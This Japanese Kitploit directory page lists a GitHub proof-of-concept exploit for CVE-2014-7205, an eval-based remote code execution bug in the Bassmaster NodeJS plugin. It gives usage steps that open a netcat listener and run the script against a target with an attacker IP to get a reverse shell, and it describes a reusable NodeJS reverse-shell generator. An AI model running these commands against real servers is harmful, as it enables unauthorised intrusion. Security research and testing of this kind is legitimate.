Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2014-7205 — Bassmaster Plugin NodeJS RCE | Kitploit
ツール/GitHubGitHub/andrewtrube/cve-2014-7205
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストシェルコード生成
GitHubandrewtrube/cve-2014-7205

CVE-2014-7205

Bassmaster Plugin NodeJS RCE

リポジトリを見る
4年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Bassmaster NodeJS プラグイン RCE PoC

bassmaster-rce.py: CVE-2014-7205 を悪用する Python スクリプト。 nodeshell.py: NodeJS 用のリバースシェルを生成する Python モジュール。

!!テスト許可のあるサーバに対してのみ使用すること

概要

CVE-2014-7205 は、NodeJS 用 Bassmaster プラグインにおけるリモートコード実行の脆弱性です。 バージョン 1.5.1 以下が影響を受けます。脆弱性は lib/batch.js ファイルの internals.batch 関数に存在し、 eval() の呼び出しでユーザー入力が適切にエスケープされていません(基本的に正規表現がリクエストに悪意のあるコードが含まれているかをチェックしていません)。

概念実証

  1. Git リポジトリをダウンロードまたはクローンします
  2. bash ターミナルで netcat リスナーを開きます nc -lvp 4444
  3. bassmaster-rce.py と nodeshell.py が同じフォルダにあることを確認します
  4. bassmaster-rce.py を実行します python3 bassmaster-rce.py -u http://target -p 8080 -l attacker.ip -P 4444

その他

  • nodeshell.py は、NodeJS 用のリバースシェルを生成する必要がある他の PoC やエクスプロイトにも完全に移植可能です。
ツールをダウンロード